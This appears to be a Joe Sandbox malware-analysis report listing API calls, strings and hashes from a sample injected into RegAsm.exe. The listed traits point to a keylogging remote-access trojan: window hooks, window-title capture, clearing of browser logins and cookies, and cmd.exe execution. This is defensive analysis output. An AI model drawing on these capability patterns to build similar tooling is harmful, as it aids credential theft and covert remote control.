                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2005118841-1866435925
                                                          • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                          • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                          • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                          • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                          • RegSetValueExW.ADVAPI32 ref: 0041384D
                                                          • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                          • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                          • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                          • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                          • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                          • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                          • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeHandleLibraryModule
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 662261464-1276376045
                                                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: X-\$pB\
                                                          • API String ID: 269201875-280243437
                                                          • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                          • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                                          • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                          • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                          • ShowWindow.USER32(00000009), ref: 00416C61
                                                          • SetForegroundWindow.USER32 ref: 00416C6D
                                                            • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                                            • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                            • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                            • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                          • String ID: !D@
                                                          • API String ID: 186401046-604454484
                                                          • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                          • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                          • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                          • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                          • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                          • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                          • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                          APIs
                                                          • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                          • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                          • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                          • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                          • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetCursorInfo$User32.dll
                                                          • API String ID: 1646373207-2714051624
                                                          • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                          • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                          • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                          • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetLastInputInfo$User32.dll
                                                          • API String ID: 2574300362-1519888992
                                                          • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                          • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                          • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                          • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                          • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                          • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                          • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                          • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                          • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                          • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                          • __freea.LIBCMT ref: 100087D5
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                          APIs
                                                          Strings
                                                          • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                          • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                          • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                                                          • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                          APIs
                                                          • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DisplayEnum$Devices$Monitors
                                                          • String ID:
                                                          • API String ID: 1432082543-0
                                                          • Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                          • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                                          • Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                          • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                                          APIs
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$CloseHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3642004256-0
                                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                          APIs
                                                            • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                                                            • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                                                            • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                          • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                          • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                          • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                          • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                          • String ID:
                                                          • API String ID: 188215759-0
                                                          • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                          • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                          • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                          • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                          • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                          • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                          • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                            • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                          • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                          • String ID:
                                                          • API String ID: 2633735394-0
                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                          • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                          • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                          APIs
                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                            • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                          • String ID:
                                                          • API String ID: 1761009282-0
                                                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                          • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                          • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
